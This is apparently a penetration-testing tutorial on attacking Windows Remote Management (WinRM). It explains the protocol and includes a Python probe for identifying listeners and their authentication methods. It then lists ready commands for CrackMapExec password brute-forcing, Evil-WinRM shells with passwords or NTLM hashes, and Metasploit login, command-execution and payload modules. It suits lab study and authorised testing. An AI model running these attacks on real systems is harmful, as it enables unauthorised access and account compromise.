WinRM

WinRM (Windows Remote Management) is Microsoft's implementation of the WS-Management protocol. It lets an operator manage Windows hosts remotely over HTTP or HTTPS. On recent Windows Server releases (Windows Server 2012 R2 onward) the service and an HTTP listener are enabled by default; on client editions of Windows it must be enabled explicitly (for example with Enable-PSRemoting or winrm quickconfig). System administrators use WinRM to:

  1. Remotely accessing and interacting with Windows hosts.

  2. Executing commands remotely on Windows systems.

  3. Managing and configuring Windows systems remotely.

WinRM listens on TCP port 5985 (HTTP) and 5986 (HTTPS) by default. The legacy WinRM 1.1 defaults were 80 and 443, so a WinRM endpoint can occasionally be found behind a web port as well.

WS-Management (WSMan) is the DMTF standard that WinRM implements; it is not a Microsoft-only protocol. Management operations are carried as SOAP (Simple Object Access Protocol) messages over HTTP(S), which standardizes how systems and management tools communicate. WinRM exposes the protocol at the /wsman endpoint, and PowerShell Remoting runs on top of it, which is why a valid WinRM login usually yields a PowerShell session.
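The exchange described above can be seen directly on the wire. The following is an added example (not code from the original page or from any of the tools it mentions): a stdlib-only Python probe that sends the WS-Man Identify request, which WinRM answers without credentials when the WSMANIDENTIFY: unauthenticated header is present (this is what Test-WSMan does), and then repeats the request without that header to read the WWW-Authenticate challenges from the 401 (the same information Metasploit's winrm_auth_methods reports). The host and port are placeholders, and the sample response and header values embedded in the block are constructed to match the shape of a WinRM reply, not captured from a real system.

```python
"""WS-Management probe for a WinRM listener (stdlib only).

Added example, not part of the original page. Sends the SOAP Identify
request that WinRM answers without credentials when the
WSMANIDENTIFY: unauthenticated header is present, then repeats it
without that header to collect the WWW-Authenticate challenges from
the resulting 401. Sample data below is constructed, not captured.
"""
import ssl
import urllib.error
import urllib.request
import xml.etree.ElementTree as ET

SOAP_NS = "http://www.w3.org/2003/05/soap-envelope"
WSMID_NS = "http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd"


def build_identify_envelope() -> bytes:
    """Minimal WS-Man Identify request: empty header, <wsmid:Identify/> body."""
    return (
        f'<s:Envelope xmlns:s="{SOAP_NS}" xmlns:wsmid="{WSMID_NS}">'
        "<s:Header/><s:Body><wsmid:Identify/></s:Body></s:Envelope>"
    ).encode()


def parse_identify_response(body: bytes) -> dict:
    """Pull the vendor/version fields out of an IdentifyResponse SOAP body."""
    root = ET.fromstring(body)
    fields = {}
    for tag in ("ProtocolVersion", "ProductVendor", "ProductVersion"):
        el = root.find(f".//{{{WSMID_NS}}}{tag}")
        if el is not None and el.text:
            fields[tag] = el.text.strip()
    return fields


def parse_auth_methods(challenges) -> list:
    """Extract scheme names (Negotiate, Kerberos, Basic, ...) from one or more
    WWW-Authenticate header values. Parameters such as realm="..." are skipped
    because their first token contains '='."""
    schemes = []
    for value in challenges:
        for segment in value.split(","):
            token = segment.strip().split(" ", 1)[0]
            if token and "=" not in token and token not in schemes:
                schemes.append(token)
    return schemes


def _post(url, body, headers, timeout, use_ssl):
    req = urllib.request.Request(url, data=body, method="POST", headers=headers)
    # Self-signed certificates are the norm on WinRM HTTPS listeners.
    ctx = ssl._create_unverified_context() if use_ssl else None
    return urllib.request.urlopen(req, timeout=timeout, context=ctx)


def probe(host: str, port: int = 5985, use_ssl: bool = False, timeout: float = 5.0) -> dict:
    """Return {'url', 'identify': {...}, 'auth_methods': [...], 'http_status'}."""
    url = f"{'https' if use_ssl else 'http'}://{host}:{port}/wsman"
    base = {"Content-Type": "application/soap+xml;charset=UTF-8"}
    result = {"url": url, "identify": {}, "auth_methods": [], "http_status": None}
    try:  # 1) unauthenticated Identify: vendor / stack version without creds
        with _post(url, build_identify_envelope(),
                   {**base, "WSMANIDENTIFY": "unauthenticated"}, timeout, use_ssl) as resp:
            result["identify"] = parse_identify_response(resp.read())
    except urllib.error.HTTPError as err:
        result["http_status"] = err.code
    try:  # 2) same request without the header: expect 401 + WWW-Authenticate
        _post(url, build_identify_envelope(), base, timeout, use_ssl).close()
    except urllib.error.HTTPError as err:
        result["http_status"] = err.code
        result["auth_methods"] = parse_auth_methods(err.headers.get_all("WWW-Authenticate") or [])
    return result


# Constructed sample data shaped like a WinRM reply (not a real capture).
SAMPLE_IDENTIFY_RESPONSE = (
    f'<s:Envelope xmlns:s="{SOAP_NS}" xmlns:wsmid="{WSMID_NS}"><s:Header/><s:Body>'
    "<wsmid:IdentifyResponse>"
    "<wsmid:ProtocolVersion>http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd</wsmid:ProtocolVersion>"
    "<wsmid:ProductVendor>Microsoft Corporation</wsmid:ProductVendor>"
    "<wsmid:ProductVersion>OS: 0.0.0 SP: 0.0 Stack: 3.0</wsmid:ProductVersion>"
    "</wsmid:IdentifyResponse></s:Body></s:Envelope>"
).encode()
SAMPLE_WWW_AUTHENTICATE = ["Negotiate", "Kerberos", 'Basic realm="WSMAN"']


def demo() -> dict:
    """Offline walk-through over the constructed sample data."""
    return {
        "identify": parse_identify_response(SAMPLE_IDENTIFY_RESPONSE),
        "auth_methods": parse_auth_methods(SAMPLE_WWW_AUTHENTICATE),
    }


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else None  # e.g. python3 probe.py 10.10.10.5
    print(probe(target) if target else demo())
```

Without an argument the script runs the offline demo; with a host it performs the two real requests. An unauthenticated Identify only reveals the vendor and WSMan stack version ("OS: 0.0.0" means the OS version is withheld until you authenticate), while the challenge list tells you whether Basic is accepted, which matters when deciding between password and hash-based attacks.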

Exploiting WinRM

WinRM authenticates every connection (NTLM, Kerberos, Basic or certificate-based) and, by default, only members of the local Administrators or Remote Management Users groups are allowed to connect. Testing therefore comes down to obtaining valid credentials: CrackMapExec can spray or brute-force passwords against the WinRM service, confirm which credentials work and run commands with them, and Evil-WinRM (a Ruby tool) turns a valid password or NTLM hash into an interactive PowerShell session on the target. This is not a reverse shell: the tester connects to the target's WinRM port, so 5985/5986 must be reachable inbound. Every failed attempt counts against the account lockout policy, so prefer a short list of likely passwords sprayed across many users over an exhaustive wordlist against a single account.

Enumeration & Brute-force

nmap -sV -p- [IP]
nmap -sV --top-ports 7000 [IP]
nmap -sV -p 5985,5986 [IP]

# crackmapexec usage (winrm module options)
crackmapexec winrm --help
# crackmapexec brute-force: one user against a password wordlist
crackmapexec winrm [IP] -u administrator -p /path/to/wordlist.txt
# validate a known credential and execute a command with it
crackmapexec winrm [IP] -u administrator -p 'password' -x 'whoami'

Getting a Shell with Evil-WinRM

ruby evil-winrm.rb -u username -p 'password' -i [IP]
or
evil-winrm -u username -p 'password' -i [IP]
# HTTPS listener (5986), or pass-the-hash with an NTLM hash instead of a password
evil-winrm -S -u username -p 'password' -i [IP]
evil-winrm -u username -H [NTLM-hash] -i [IP]

w/ Metasploit

# Brute-force
msfconsole -q
use auxiliary/scanner/winrm/winrm_login
set RHOSTS demo.ine.local
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
set VERBOSE false
set PASSWORD anything
exploit

# PASSWORD is set to a dummy value because recent versions of the winrm_login module require the PASSWORD option unless Kerberos authentication is used; the module still iterates every USER_FILE/PASS_FILE combination.

# Supported authentication method
use auxiliary/scanner/winrm/winrm_auth_methods
set RHOSTS demo.ine.local
exploit

# Execute Command
use auxiliary/scanner/winrm/winrm_cmd
set RHOSTS demo.ine.local
set USERNAME administrator
set PASSWORD tinkerbell
set CMD whoami
exploit

# Exploitation
msfconsole -q
search winrm_script
use exploit/windows/winrm/winrm_script_exec
show options
set RHOSTS [IP]
# FORCE_VBS: deliver the payload with the VBS CmdStager instead of PowerShell
set FORCE_VBS true
set USERNAME [username]
set PASSWORD [password]
exploit
